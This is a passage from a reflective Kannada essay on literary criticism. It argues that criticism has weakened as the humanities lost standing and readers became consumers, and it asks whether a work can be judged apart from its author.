ಬದುಕಿಗೂ ಬೇಕಿದೆ ವಿಮರ್ಶೆ

ಯಾವುದೇ ಕಾಲದಲ್ಲಿ ಚಾಲ್ತಿಯಲ್ಲಿರುವ ಸಾಹಿತ್ಯವಿಮರ್ಶೆ ಎಂಬ ಬರವಣಿಗೆಯನ್ನು ತಲೆಮಾರಿಗೊಮ್ಮೆಯಾದರೂ ವಿಮರ್ಶೆಗೆ ಒಳಪಡಿಸುವುದು ಅಗತ್ಯ. ವಿಮರ್ಶೆಯೇ ವಿಮರ್ಶೆಯ ಸ್ವಾಸ್ಥ್ಯವನ್ನೂ ಸಾಹಿತ್ಯದ ಸ್ವಾಸ್ಥ್ಯವನ್ನೂ ಕಾಪಾಡುವ ಶಕ್ತಿ.

`ಬದುಕಿಗೆ ವಿಮರ್ಶೆ ಅನ್ನುವುದು ಉಸಿರಾಟದಷ್ಟೇ ಅನಿವಾರ್ಯ’ ಎಂಬ ಮಾತಿದೆ. ಅನುಭವಗಳನ್ನು ಹೋಲಿಸಿ ನೋಡುವ, ಬೆಲೆ ಕಟ್ಟುವ ಕೆಲಸವಾಗಿ ವಿಮರ್ಶೆ ಎಂಬುದು ಮನುಷ್ಯನ ಪ್ರವೃತ್ತಿಯಲ್ಲೇ ಸೇರಿದೆ. ಸಾಹಿತ್ಯ ವಿಮರ್ಶೆ ಮನುಷ್ಯನಲ್ಲಿರುವ ಈ ಪ್ರವೃತ್ತಿ ವ್ಯಕ್ತವಾಗುವ ಒಂದು ಬಗೆ ಅಷ್ಟೇ. ನಮ್ಮ ಇತರ ಯಾವುದೇ ಪ್ರವೃತ್ತಿಗಳ ಹಾಗೆ ವಿಮರ್ಶೆಯ ಪ್ರವೃತ್ತಿಯನ್ನೂ ಎಚ್ಚರದಲ್ಲಿ ಬಳಸುತ್ತ ಪೋಷಿಸುವ ಜವಾಬ್ದಾರಿ ನಮ್ಮದೇ. ನನ್ನ ಸುತ್ತಲಿನ ಆಗು ಹೋಗುಗಳನ್ನು ನೋಡುತ್ತ ಬದುಕು ಈಗ ಇರುವ ಹಾಗೆ ಅ-ಸಹ್ಯವಾಗಿ ಸ್ವಸ್ಥವಾಗಿ ಇರುವುದಕ್ಕೆ ವಿಮರ್ಶನ ಶಕ್ತಿಯ ಅಭಾವ ಅಥವಾ ನಮ್ಮೊಳಗಿನ ಈ ಪ್ರವೃತ್ತಿಯನ್ನು ಬೆಳೆಸಿಕೊಳ್ಳುವುದಕ್ಕೆ ಅವಕಾಶ ಕೊಡದ ಪರಿಸರ ಕಾಣುತ್ತಿದೆ. ಹೀಗಿರುವಾಗ ಸಾಹಿತ್ಯ ವಿಮರ್ಶೆ ಮಾತ್ರ ಆರೋಗ್ಯಪೂರ್ಣವಾಗಿ, ಸ್ವಸ್ಥವಾಗಿ ಇರಬೇಕೆಂದು ನಿರೀಕ್ಷಿಸುವುದು…

’ಏನು ಬರೆದಿದ್ದಾರೆ ಅನ್ನುವುದಕ್ಕಿಂತ ಯಾರು ಬರೆದಿದ್ದಾರೆ’ ಅನ್ನುವುದು ಮುಖ್ಯವಾಗಿದೆ, ಹೀಗಾಗಿ ಹಲವು ದಶಕಗಳೇ ಕಳೆದಿವೆ ಎಂದಿದ್ದರು ಹಿರಿಯರೊಬ್ಬರು. ವ್ಯಕ್ತಿ ಮತ್ತು ಸಮಾಜ ಎರಡೂ ಬೇರೆ, ವೈಯಕ್ತಿಕಕ್ಕಿಂತ ಸಾಮಾಜಿಕ ಮುಖ್ಯ ಎಂಬ ಕೃತಕ, ಅಪಾಯಕಾರೀ ವಿಂಗಡಣೆಯೂ ನಮಗೇ ಗೊತ್ತಿಲ್ಲದ ಹಾಗೆ ಸ್ಥಿರಗೊಂಡಿದೆ. ವಿಚಾರದ ತೋರಿಕೆ, ಮಾತಿನಲ್ಲಷ್ಟೇ ನಿಲುವು ತಳೆಯುವುದು ಇವೆಲ್ಲ ನಮ್ಮೊಳಗನ್ನು ನಾವೇ ನೋಡಿಕೊಂಡು ಸಾವಕಾಶವಾಗಿ ಮಾಗುತ್ತ ಸಾಗುವುದಕ್ಕಿಂತ ಸುಲಭದ ಕೆಲಸ. ಸುಲಭದ ದಾರಿ ಹಿಡಿದಿದ್ದೇವೆ; ಅಂತರಂಗ-ಬಹಿರಂಗಗಳನ್ನು ಕತ್ತರಿಸಿಟ್ಟುಕೊಂಡಿದ್ದೇವೆ. ನನಗಾಗಿ ಓದಬೇಕು ನನಗಾಗಿ ಬರೆಯಬೇಕು ಅನ್ನುವುದಕ್ಕಿಂತ ತೋರಿಕೆಗೆ ಓದಬೇಕು, ಮತ್ತೇನೋ ಸಂಪಾದಿಸಲು ಬರೆಯಬೇಕು, ಹಾಗೆ ಸಂಪಾದಿಸುವುದಕ್ಕೆ ಯಾರನ್ನು ಹೊಗಳಬೇಕು ಅನ್ನುವ ಜಾಣತನ ಬೇಕು… ಹೀಗೆ ಸಾಗಿದೆ ಅನಿಸುತ್ತದೆ ಯೋಚನೆಯ ದಾರಿ.

ಸಾಹಿತ್ಯದ ಬೋಧನೆ, ಚಿಂತನೆ, ಕಲಿಕೆ, ಇವೆಲ್ಲ ಅಮುಖ್ಯ ಅನಿಸತೊಡಗಿವೆ. ಹಾಗಾಗಿ ವಿಮರ್ಶೆಗೆ ಅಗತ್ಯವಾದ ತಾತ್ವಿಕ ಚಿಂತನೆ, ವಿಶ್ಲೇಷಣೆಯ ಸಾಮರ್ಥ್ಯ, ಅನುಭವಕ್ಕೆ ಬೆಲೆ ಕಟ್ಟುವ ಸೂಕ್ಷ್ಮ ಕೌಶಲ ಮರೆಯಾದಂತೆ ತೋರುತ್ತದೆ.

`ಕವಿತೆಯಿಂದ ಏನೂ ಆಗುವುದಿಲ್ಲ’ ಎಂದೊಬ್ಬ ಮಹಾಕವಿಯೇ ಹೇಳಿರುವುದುಂಟು. ಹೆಚ್ಚೆಂದರೆ ಅಂತರಂಗವನ್ನು ಮುಟ್ಟಿ ಬದಲಾಗಬೇಕೆಂಬ ಕ್ರಿಯಾಶೀಲತೆಯನ್ನು ನಮ್ಮೊಳಗೆ ಹುಟ್ಟಿಸಬಹುದು, ಅದಷ್ಟೇ ಸಾಹಿತ್ಯದ ಮಹಾನ್ ಶಕ್ತಿ. ರಸ್ಕಿನ್ ಬರೆದ ಪುಸ್ತಕ, ಎಳವೆಯಲ್ಲಿ ನೋಡಿದ ಹರಿಶ್ಚಂದ್ರ ನಾಟಕ ಗಾಂಧಿಯವರನ್ನು ಬದಲಾಯಿಸಿದ ಹಾಗೆ. ಹಾಗೆ ನಮಗೇ ಬೇಕೆಂದು ಓದುವ ಸಾಮಥ್ರ್ಯ, ಅಗತ್ಯಗಳನ್ನು ಸಮುದಾಯ ಕಳೆದುಕೊಳ್ಳುತ್ತಿದೆಯೋ? ನಾವು ಬದಲಾಗಲೊಲ್ಲದೆ ಲೋಕವನ್ನು ಬದಲಾಯಿಸಲು ಹೊರಟಾಗ ಸಾಹಿತ್ಯದ ಮೇಲೂ ವಿಮರ್ಶೆಯ ಮೇಲೂ ಅನಗತ್ಯವಾದ ಸ್ವಸ್ಥವಲ್ಲದ ಒತ್ತಡ ಬೀಳುತ್ತದೆ. ಸಾಹಿತ್ಯವು ಸಮಾಜದ ಸಮಸ್ಯೆಗಳಿಗೆ ಖಂಡಿತ ಪರಿಹಾರ ಒದಗಿಸಲಾರದು. ಸಾಹಿತ್ಯ ವಿಮರ್ಶೆ ನಮ್ಮನ್ನೇ ವಿಮರ್ಶೆಗೆ ಒಡ್ಡಿಕೊಳ್ಳುವ ಕೆಲಸವಾಗದಿದ್ದರೆ ಅದರಿಂದ ವಿಮರ್ಶೆ ಬರೆದವರಿಗೂ, ಓದುವವರಿಗೂ ಉಪಯೋಗವಾಗದು.

ನಮ್ಮ ಸಾಹಿತ್ಯ ವಿಮರ್ಶೆಯ ಇಂದಿನ ಸ್ಥಿತಿಗೆ ಎರಡು ಕಾರಣ ಹೊಳೆಯುತ್ತಿವೆ. ಸಾಹಿತ್ಯ ವಿಮರ್ಶೆ ಮುಖ್ಯವಾಗಿ ಸಾಹಿತ್ಯ ವಿದ್ಯಾರ್ಥಿಗಳನ್ನು ಗಮನದಲ್ಲಿಟ್ಟುಕೊಂಡದ್ದು; ಹೀಗೆ ಸಾಹಿತ್ಯವನ್ನು ಓದಬೇಕು, ಹೀಗೆ ಅದನ್ನು ಬರೆಯಬೇಕು ಎಂದು ಕಲಿಸುವ ಶಿಸ್ತು. ಸಾಹಿತ್ಯ ಮತ್ತು ಮಾನವಿಕ ವಿಷಯಗಳಿಗೆ ಸುಮಾರು ನಾಲ್ಕೈದು ದಶಕಗಳ ಹಿಂದೆ ಇದ್ದ ಪ್ರಾಮುಖ್ಯ ಈಗಿಲ್ಲ. ಹಾಗಾಗಿ ಸಾಹಿತ್ಯದ ಬೋಧನೆ, ಚಿಂತನೆ, ಕಲಿಕೆ, ಇವೆಲ್ಲ ಅಮುಖ್ಯ ಅನಿಸತೊಡಗಿವೆ. ಹಾಗಾಗಿ ವಿಮರ್ಶೆಗೆ ಅಗತ್ಯವಾದ ತಾತ್ವಿಕ ಚಿಂತನೆ, ವಿಶ್ಲೇಷಣೆಯ ಸಾಮಥ್ರ್ಯ, ಅನುಭವಕ್ಕೆ ಬೆಲೆ ಕಟ್ಟುವ ಸೂಕ್ಷ್ಮ ಕೌಶಲ ಮರೆಯಾದಂತೆ ತೋರುತ್ತದೆ.

`ಅನುಭವ’ಕ್ಕಿಂತ ಸುಲಭವಾಗಿ ದಕ್ಕುವ `ಅರ್ಥ’ಕ್ಕೆ, ಬೇರೆ ಮಾತಿನಲ್ಲಿ ಪರಿಚಿತ ನುಡಿಗಟ್ಟಿನಲ್ಲಿ ಹೇಳಬಹುದಾದ `ಆಶಯ’ಕ್ಕೆ ಹಾತೊರೆಯುವುದು ಹೆಚ್ಚಾಗಿದೆ. ಇವೆರಡೂ ಕಾರಣಗಳ ಬೇರು ಇರುವುದು ಸಾಮುದಾಯಿಕ ಸಹಮತದ ಅಭಾವದಲ್ಲಿ. ಅಲ್ಲಮನ ಮಾತು ಇದು: `ಹೊನ್ನ ತೂಗಿದ ತ್ರಾಸು ಕಟ್ಟಳೆ ಹೊನ್ನಿಗೆ ಸಮನಪ್ಪುದೇ?’

ಎರಡನೆಯ ಕಾರಣ `ಅನುಭವ’ಕ್ಕಿಂತ ಸುಲಭವಾಗಿ ದಕ್ಕುವ `ಅರ್ಥ’ಕ್ಕೆ, ಬೇರೆ ಮಾತಿನಲ್ಲಿ ಪರಿಚಿತ ನುಡಿಗಟ್ಟಿನಲ್ಲಿ ಹೇಳಬಹುದಾದ `ಆಶಯ’ಕ್ಕೆ ಹಾತೊರೆಯುವುದು ಹೆಚ್ಚಾಗಿದೆ. ಇವೆರಡೂ ಕಾರಣಗಳ ಬೇರು ಇರುವುದು ಸಾಮುದಾಯಿಕ ಸಹಮತದ ಅಭಾವದಲ್ಲಿ. ಅಲ್ಲಮನ ಮಾತು ಇದು: `ಹೊನ್ನ ತೂಗಿದ ತ್ರಾಸು ಕಟ್ಟಳೆ ಹೊನ್ನಿಗೆ ಸಮನಪ್ಪುದೇ?’ ಸಾಹಿತ್ಯ ಹೊನ್ನು ಎಂದಾದರೆ ಸಾಹಿತ್ಯ ವಿಮರ್ಶೆ ತ್ರಾಸು, ಕಟ್ಟಳೆ. ಇಂದಿನ ತೊಡಕು ಎಂದರೆ ಹೊನ್ನನ್ನು ತೂಗುವುದಕ್ಕೆ ಬಳಸಲೇಬೇಕಾದ ತೂಕದ ಬೊಟ್ಟುಗಳ ಬಗ್ಗೆಯೇ ಸಹಮತವಿಲ್ಲದಿರುವುದು. ಯಾವುದು ಮೌಲ್ಯ ಎಂಬ ಬಗ್ಗೆಯೇ ಗೊಂದಲವಿರುವುದು. ಇಂಥ ಗೊಂದಲಕ್ಕೆ ಇಡೀ ಜಗತ್ತಿನಲ್ಲಿ ಆಗುತ್ತಿರುವ ಬದಲಾವಣೆಗಳೂ ಕಾರಣವಾಗಿವೆ.

ಹಿಂದೊಮ್ಮೆ ಸಹೃದಯ ಎಂದು ಕರೆಯಲಾಗುತ್ತಿದ್ದ ವ್ಯಕ್ತಿತ್ವ ಲೋಲುಪ ರಸಿಕನ ವ್ಯಕ್ತಿತ್ವವಾಗಿ, ಆನಂತರ ಇತರ ಉದ್ದೇಶಗಳಿಗಾಗಿ ಸಾಹಿತ್ಯವನ್ನು ಬಳಸಿಕೊಳ್ಳುವ ಓದುಗ ವ್ಯಕ್ತಿತ್ವವಾಗಿ, ಅಂಥ ಓದುಗನೂ ಈಗ ಸಾಹಿತ್ಯ ಗ್ರಾಹಕನಾಗಿ ಬದಲಾಗಿರುವುದು ಕಾಣುತ್ತಿಲ್ಲವೇ? ಇದು ಕೇವಲ ಪದಗಳ ಬದಲಾವಣೆಯಲ್ಲ ಬದುಕಿನ ಕ್ರಮದಲ್ಲಿ ಆಗುತ್ತಿರುವ ಬದಲಾವಣೆಯ ಪ್ರತಿಫಲನ. ಗ್ರಾಹಕರಾಗಿರುವ ಓದುಗರಿಗೆ ಅನುಕೂಲವಾಗಲೆಂದು ಕೃತಿಯೊಂದರ `ಬೆಲೆ’ಯನ್ನು ಖಚಿತವಾಗಿ ತಿಳಿಸುವ ಕನ್‍ಸ್ಯೂಮರ್ ರೇಟಿಂಗ್ ಥರದ ವಿಮರ್ಶೆಯನ್ನು ಬಯಸುತ್ತಿದ್ದೇವೆಯೋ? ಕೃತಿಕಾರರೂ ತಮ್ಮ ಕೃತಿ ಟಾಪ್ ಟೆನ್ ಪಟ್ಟಿಯಲ್ಲಿ ಕಾಣಿಸಿಕೊಳ್ಳಬೇಕೆಂದು ಬಯಸುತ್ತಿದ್ದಾರೋ? ಅಕ್ಕಪಕ್ಕದಲ್ಲಿರುವ ಕನ್ನಡ ಓದುಗರಿಗಿಂತ ಜಗತ್ತಿನ ಓದುಗರಿಗೆ ತಲುಪಬೇಕೆಂಬ ಮಹತ್ವಾಕಾಂಕ್ಷೆ ಬೆಳೆಯುತ್ತಿದೆಯೋ… ಸಾಹಿತ್ಯ ವಿಮರ್ಶೆಯ ಇಂದಿನ ಸ್ಥಿತಿಗೆ ಕೃತಿ, ಕೃತಿಕಾರ, ಓದುಗ ಮತ್ತು ಇವು ಮೂರೂ ಇರುವ ಸಮಾಜ -ಈ ಕುರಿತ ತಿಳಿವಳಿಕೆಯಲ್ಲಿ ನಮಗೆ ಇರುವ ಅಸ್ಪಷ್ಟತೆ, ಗೊಂದಲಗಳೂ ಕಾರಣವಾಗಿವೆ ಅಲ್ಲವೇ? ಸಾಹಿತ್ಯ ಮತ್ತು ವಿಮರ್ಶೆಗಳು ಇರುವುದೇ ಬದುಕಿನ ಸಂದಿಗ್ಧತೆ ಅಸ್ಪಷ್ಟತೆ, ಅರ್ಥಹೀನತೆಗಳನ್ನು ಕಣ್ಣಲ್ಲಿ ಕಣ್ಣಿಟ್ಟು ನೋಡುವ ಧೈರ್ಯ ಕೊಡುವುದಕ್ಕಾಗಿ.

ಈ ಪ್ರಶ್ನೆ ಒಳಗೊಂಡಿರುವ ಆದರ್ಶ ನಿಜವಾಗಬೇಕಾದರೆ ವಿಮರ್ಶಕರು ಕಾಲಪುರುಷನಂತಾಗಬೇಕು! ಸ್ವಹಿತದ ಅಪೇಕ್ಷೆ ತೊರೆದವರಾಗಬೇಕು, ಮುಲಾಜುಗಳಿಗೆ ಒಳಗಾಗಬಾರದು… ಇಂಥ ಪಟ್ಟಿ ಬೆಳೆಯುತ್ತದೆ.

ಈ ಚರ್ಚೆಯಲ್ಲಿ ಎತ್ತಿರುವ ಎರಡು ಪ್ರಶ್ನೆಗಳಲ್ಲಿ ಒಂದು -ಸಾಹಿತಿಗಳ ಧೋರಣೆ, ನಿಲುವುಗಳನ್ನು ಬಿಟ್ಟು `ಕೃತಿಯೊಂದರಲ್ಲಿ ಅಡಕವಾಗಿರುವ ಸತ್ಯ-ಆಶಯಗಳ ಹುಡುಕಾಟ ಮತ್ತು ಮೌಲ್ಯ ಮಾಪನ ಸಾಧ್ಯವೇ?’ ಇದು ವಿಮರ್ಶೆ ಹೀಗಿರಬೇಕು, ಕೃತಿಗೆ ಮಾತ್ರ ನಿಷ್ಠವಾಗಿರಬೇಕು ಎಂಬ ಆಶಯ, ವಿಮರ್ಶೆ ಹೀಗಿರಬೇಕು ಎಂದು ವಿಮರ್ಶಕರು ಇಟ್ಟುಕೊಳ್ಳಬೇಕಾದ ಎಚ್ಚರ, ವಿಮರ್ಶೆ ಹೀಗೆಯೇ ಇರಬೇಕೆಂಬ ಆದರ್ಶ ಈ ಎಲ್ಲ ದನಿಗಳನ್ನೂ ಒಳಗೊಂಡಿದೆ. ವಿಮರ್ಶಕರು ಹೊನ್ನು ತೂಗುವ ತ್ರಾಸುಕಟ್ಟಳೆಗಳು ಮಾತ್ರವಾಗಿದ್ದಾಗ, ನಿಷ್ಠುರ ನಿರ್ಲಿಪ್ತ ಸ್ವಾರ್ಥರಹಿತ ವ್ಯಕ್ತಿತ್ವ ಬೆಳೆಸಿಕೊಂಡಾಗ ಇಂಥ ವಿಮರ್ಶೆ ಸಾಧ್ಯವಾದೀತು. ಯಾವುದನ್ನು ನಾವು `ಕಾಲ’ ಎನ್ನುವೆವೋ ಅದು ವ್ಯಕ್ತಿಯನ್ನು ಮರೆವಿನ ಸಮುದ್ರದಲ್ಲಿ ತಳ್ಳಿಬಿಡುತ್ತದೆ, ವ್ಯಕ್ತಿ ಮಾಡಿದ ಕಾರ್ಯವನ್ನು, ಕೃತಿಯನ್ನು ಉಳಿಸಿಕೊಳ್ಳುತ್ತದೆ.

ಪಂಪ ಹೇಗಿದ್ದನೋ, ಅವನ ನಿಲುವುಗಳೇನೋ, ವ್ಯಕ್ತಿಯಾಗಿ ಅವನ ವರ್ತನೆ ಹೇಗಿತ್ತೋ ಅವೆಲ್ಲ ಯಾಕೆ ಬೇಕು? ಉಳಿದಿರುವುದು ಕೃತಿ, ಕೃತಿ ಕೊಡುವ ಅನುಭವ, ಅದರಿಂದ ನಾವು ಕಟ್ಟಿಕೊಳ್ಳುವ ಅರ್ಥ, ಇಷ್ಟೇ ಅಲ್ಲವೇ? ಈ ಪ್ರಶ್ನೆ ಒಳಗೊಂಡಿರುವ ಆದರ್ಶ ನಿಜವಾಗಬೇಕಾದರೆ ವಿಮರ್ಶಕರು ಕಾಲಪುರುಷನಂತಾಗಬೇಕು! ಸ್ವಹಿತದ ಅಪೇಕ್ಷೆ ತೊರೆದವರಾಗಬೇಕು, ಮುಲಾಜುಗಳಿಗೆ ಒಳಗಾಗಬಾರದು… ಇಂಥ ಪಟ್ಟಿ ಬೆಳೆಯುತ್ತದೆ.

ಮಿಕ್ಕ ಎಲ್ಲ ಸಂಗತಿಗಳನ್ನು ನಿರ್ಲಕ್ಷಿಸಿ ಕೇವಲ ಪಠ್ಯಕ್ಕೆ ಸೀಮಿತವಾಗಿ ವಿಮರ್ಶೆ ಮಾಡಬೇಕೆ ಎಂಬ ಪ್ರಶ್ನೆಯಲ್ಲಿಯೇ `ಹಾಗೆ ಮಾಡಬಾರದು’ ಎಂಬ ಉತ್ತರವೂ ಇರುವಂತಿದೆ. ನಮ್ಮ ಜೊತೆಯಲ್ಲಿಯೇ ಬದುಕಿರುವ ಲೇಖಕರ ಕೃತಿಗಳನ್ನು ಕುರಿತು ವಿಮರ್ಶೆ ಮಾಡುವಾಗ ಮೆಚ್ಚಿಸುವ, ಲಾಭ ಗಿಟ್ಟಿಸುವ ಆಸೆಗಳ ಹಾಗೆಯೇ ಸ್ನೇಹ ಸಂಬಂಧಗಳು ಹಾಳಾದಾವೆಂಬ ಆತಂಕವೂ ಇರುವುದಕ್ಕೆ ಸಾಧ್ಯ. ವಿಮರ್ಶೆಯನ್ನು ಸಾಂಸ್ಕೃತಿಕ ಅಧಿಕಾರ ಪಡೆಯುವ ಉಪಕರಣವಾಗಿ ಬಳಸಿಕೊಳ್ಳುವ ಪ್ರಲೋಭನೆಯೂ ಇರಲು ಸಾಧ್ಯವಿದೆ. ಇವೆಲ್ಲ ನೈತಿಕ ನಿಲುವಿನ ಪ್ರಶ್ನೆಗಳೋ?

ಸಾಹಿತ್ಯದ ಸಾಹಿತ್ಯಕ ಗುಣ ಕೇವಲ ಸಾಹಿತ್ಯಕ ಚಿಂತನೆಗಳಿಂದ ರೂಪುಗೊಳ್ಳುವುದಲ್ಲ, ಸಾಹಿತ್ಯದ ಬಗ್ಗೆ ಆಯಾ ಕಾಲಘಟ್ಟದ ಸಮಾಜ ಹೊಂದಿರುವ ನಿರೀಕ್ಷೆ, ಮಾಡಿಕೊಳ್ಳುವ ವ್ಯಾಖ್ಯಾನ, ಬಹಳ ಮಟ್ಟಿಗೆ ಅಪ್ರಜ್ಞಾಪೂರ್ವಕವಾಗಿಯೇ ರೂಪುಗೊಳ್ಳುವ ಬದುಕಿನ ಉದ್ದೇಶ, ಸಾಮಾಜಿಕ ವ್ಯವಸ್ಥೆ, ಅಧಿಕಾರದ ಸ್ವರೂಪ ಇವೂ ಕಾರಣವಾಗುತ್ತವೆ.

ಹೀಗನ್ನಿಸುವುದಕ್ಕೆ ಕಾರಣ ಇದು: ಯಾವುದು ಸಾಹಿತ್ಯ, ಯಾವುದು ಅಲ್ಲ, ಸಾಹಿತ್ಯದ ಉದ್ದೇಶ ಏನು ಎಂದು ಗುರುತಿಸುವ ಅಳತೆಬೊಟ್ಟುಗಳೇ ಕಾಲಕ್ರಮದಲ್ಲಿ ಬದಲಾಗುತ್ತವೆ. ಸಾಹಿತ್ಯದ ಸಾಹಿತ್ಯಕ ಗುಣ ಕೇವಲ ಸಾಹಿತ್ಯಕ ಚಿಂತನೆಗಳಿಂದ ರೂಪುಗೊಳ್ಳುವುದಲ್ಲ, ಸಾಹಿತ್ಯದ ಬಗ್ಗೆ ಆಯಾ ಕಾಲಘಟ್ಟದ ಸಮಾಜ ಹೊಂದಿರುವ ನಿರೀಕ್ಷೆ, ಮಾಡಿಕೊಳ್ಳುವ ವ್ಯಾಖ್ಯಾನ, ಬಹಳ ಮಟ್ಟಿಗೆ ಅಪ್ರಜ್ಞಾಪೂರ್ವಕವಾಗಿಯೇ ರೂಪುಗೊಳ್ಳುವ ಬದುಕಿನ ಉದ್ದೇಶ, ಸಾಮಾಜಿಕ ವ್ಯವಸ್ಥೆ, ಅಧಿಕಾರದ ಸ್ವರೂಪ ಇವೂ ಕಾರಣವಾಗುತ್ತವೆ. ಸಾಹಿತ್ಯ ವಿಮರ್ಶೆಯ ಸ್ವರೂಪ ಉದ್ದೇಶಗಳೂ ಬದಲಾಗುತ್ತವೆ.

ಮಾಸ್ತಿಯವರು ಸಾಹಿತ್ಯ ಮತ್ತು ವಿಮರ್ಶೆ ಬರೆದ ಕಾಲ, ಅನಂತಮೂರ್ತಿ ಲಂಕೇಶರು ಬರೆದ ಕಾಲ, ಮತ್ತು ತಾಂತ್ರಿಕವಾಗಿ ಅಗಾಧವಾದ ಬದಲಾವಣೆಗಳಾಗಿರುವ ನಾವು ಬದುಕಿರುವ ಈ ಕಾಲದ ಸಾಹಿತ್ಯ ಮತ್ತು ವಿಮರ್ಶೆಯ ಕಲ್ಪನೆ, ಗ್ರಹಿಕೆಗಳು ಖಂಡಿತ ಬೇರೆ ಬೇರೆ. ಜೊತೆಗೇ ಸಾಹಿತ್ಯವನ್ನು ಓದುವ ಸಾಮಾಜಿಕ ವರ್ಗವೂ ಐವತ್ತು ವರ್ಷದ ಹಿಂದೆ ಇದ್ದುದಕ್ಕಿಂತ ತೀರ ಬೇರೆ. ಇನ್ನು ಐವತ್ತು ವರ್ಷಗಳ ನಂತರ ಇನ್ನೂ ಬೇರೆಯಾಗುತ್ತದೆ, ಖಂಡಿತ. ವ್ಯಾಪಕವಾದ ಓದು, ವಿದ್ವತ್ತುಗಳು ವಿಮರ್ಶಕರಿಗೆ ಅಗತ್ಯವೆಂದು ನಂಬಿದ್ದ ಕಾಲ ಇದ್ದ ಹಾಗೆಯೇ `ನಮ್ಮ’ ಸಮೂಹ ಒಪ್ಪಿರುವ ನಿಲುವು ಸಿದ್ಧಾಂತಗಳನ್ನು ಕೃತಿಗೆ ಅನ್ವಯಿಸಿ ಹೊಗಳುವ ಅಥವ ತೆಗಳುವ ಬುದ್ಧಿವಂತಿಕೆ ಇದ್ದರೆ ಸಾಕು ಅನ್ನುವ ಕಾಲವೂ ಇದೆ. ವಿಮರ್ಶೆ ಎಂದರೆ ಲೇಖಕರಿಗೆ ಪ್ರಸಿದ್ಧಿ, ಪ್ರಶಸ್ತಿಗಳನ್ನು ಕೊಡಿಸುವ ಅಧಿಕಾರ ಎಂಬ ಸುಳ್ಳು ನಂಬಿಕೆಯೂ ಇದೆ. ಪ್ರಿಯರಾದ ವಿಮರ್ಶಕರ ತೀರ್ಮಾನಗಳನ್ನೇ ನೆಚ್ಚಿಕೊಂಡು ಬಲ್ಲೆವೆಂದು ಬೀಗುವ ಓದುಗ-ವಿದ್ಯಾರ್ಥಿ ಸಮೂಹಗಳೂ ಇವೆ. ಹೀಗಿರುವಾಗ `ಆದರ್ಶ’ ಲೇಖಕರು, `ಆದರ್ಶ’ ವಿಮರ್ಶಕರು, ಇಂಥ ಕಲ್ಪನೆಗಳ ಉಪಯೋಗ ಸೀಮಿತವಾದದ್ದೆಂದು ತೋರುತ್ತದೆ.

ಕೃತಿಕಾರರನ್ನು ನಿಂದಿಸುವಾಗ, ಹೊಗಳುವಾಗ ನಮ್ಮನ್ನೇ ನಿಂದಿಸುತ್ತ, ಹೊಗಳಿಕೊಳ್ಳುತ್ತ ಇರುತ್ತೇವಲ್ಲವೇ? ನಮ್ಮ ಮನಸಿನಲ್ಲಿ ನಾವು ಕಲ್ಪಿಸಿಕೊಂಡ ವ್ಯಕ್ತಿತ್ವದ ಬಿಂಬವನ್ನು ಪ್ರೀತಿಸುತ್ತೇವೆ, ದ್ವೇಷಿಸುತ್ತೇವೆಯೇ ಹೊರತು ಜೀವಂತ ವ್ಯಕ್ತಿಯನ್ನು ಆತ/ಆಕೆ ಇರುವ ಹಾಗೆ ಗ್ರಹಿಸುವುದು, ಪ್ರೀತಿಸುವುದು, ದ್ವೇಷಿಸುವುದು ಅಸಾಧ್ಯ ಎಂಬಷ್ಟು ಕಷ್ಟ ಅನ್ನುತ್ತಾರೆ ತತ್ವಜ್ಞಾನಿಗಳು. ನಿಜ ಅನಿಸುತ್ತದೆ.

ಸಾಹಿತ್ಯದ ಓದು ಎಂದರೆ ನಮ್ಮನ್ನೇ ಓದಿಕೊಳ್ಳುವ ಕೆಲಸ; ಸಾಹಿತ್ಯದ ಓದು ಎಂದರೆ ನಾನಲ್ಲದ ಇನ್ನೊಂದು ಮನಸ್ಸು ನಮ್ಮ ಭಾಷೆಯಲ್ಲಿ ಕಟ್ಟಿಕೊಟ್ಟಿರುವ ಲೋಕವನ್ನು ನನ್ನೊಳಗೆ ಮತ್ತೆ ಕಟ್ಟಿಕೊಳ್ಳುವ ಕೆಲಸ; ನಾನಲ್ಲದ ಮನಸಿಗೆ ವಾಸ್ತವ ಲೋಕ ಹೇಗೆ ಕಾಣುತ್ತದೆ ಎಂಬ ಕುತೂಹಲವನ್ನು ತಣಿಸಿಕೊಳ್ಳುವ, ಬೆಲೆ ಕಟ್ಟುವ ಕೆಲಸ. ವಿಮರ್ಶೆ ಎಂದರೆ ಕೃತಿಯ ಓದಿನಿಂದ ನನಗೆ ಆದ ಅನುಭವವನ್ನು, ಹಾಗೆ ಅನುಭವವಾಗುವುದಕ್ಕೆ ಕಾರಣವಾದ ಕೃತಿಯೊಳಗಿನ ಸಂಗತಿಗಳನ್ನು ಇತರ ಓದುಗರ ಜೊತೆಯಲ್ಲಿ ಹಂಚಿಕೊಳ್ಳುವ ಕೆಲಸ. ಇದು ಸಾವಧಾನವಾಗಿ ನಡೆಯಬೇಕಾದದ್ದು, ಗಂಭೀರವಾಗಿ ನಡೆಯಬೇಕಾದದ್ದು ಬದಲವಾಣೆಯ ಸಾಧ್ಯತೆಗಳನ್ನು ಮರೆಯದ್ದು, ತೀರ್ಮಾನ ಮೌಲ್ಯಮಾಪನಗಳೆಲ್ಲ ಶಾಶ್ವತ ಸ್ಥಿರ ಸಂಗತಿಗಳಲ್ಲ ಅನ್ನುವ ನಂಬಿಕೆಗಳೊಂದಿಗೆ ಬೆಳೆದವನು ನಾನು.

ಸಾಹಿತ್ಯದ ಅನುಭವ ಹೇಗೋ ಸಾಹಿತಿ ಎಂಬ ವ್ಯಕ್ತಿಯನ್ನು ಕುರಿತ ನಮ್ಮ ಕಲ್ಪನೆಗಳೂ ಹಾಗೆ ವೈಯಕ್ತಿಕವೇ. ನಾನು ರೂಪಿಸಿಕೊಂಡಿರುವ ಬಸವನೋ ಕುವೆಂಪುವೋ ನನ್ನ ಕಲ್ಪನೆ ಕಟ್ಟಿರುವ, ನಾನು ಬಯಸುವಂಥ ಅಥವ ಬಯಸದಂಥ ಕಾಲ್ಪನಿಕ ವ್ಯಕ್ತಿತ್ವವೇ ಹೊರತು ಅದಕ್ಕೂ ಉಸಿರಾಡುತ್ತ ಓಡಾಡಿಕೊಂಡಿರುವ ತನ್ನದೇ ಜಂಜಡಗಳಲ್ಲಿ ಮುಳುಗಿರುವ ನಿಜ ಸಾಹಿತಿ, ಲೇಖಕರಿಗೂ ಸಂಬಂಧ ಇರುವುದೇ ಇಲ್ಲ. ಕೃತಿಕಾರರನ್ನು ನಿಂದಿಸುವಾಗ, ಹೊಗಳುವಾಗ ನಮ್ಮನ್ನೇ ನಿಂದಿಸುತ್ತ, 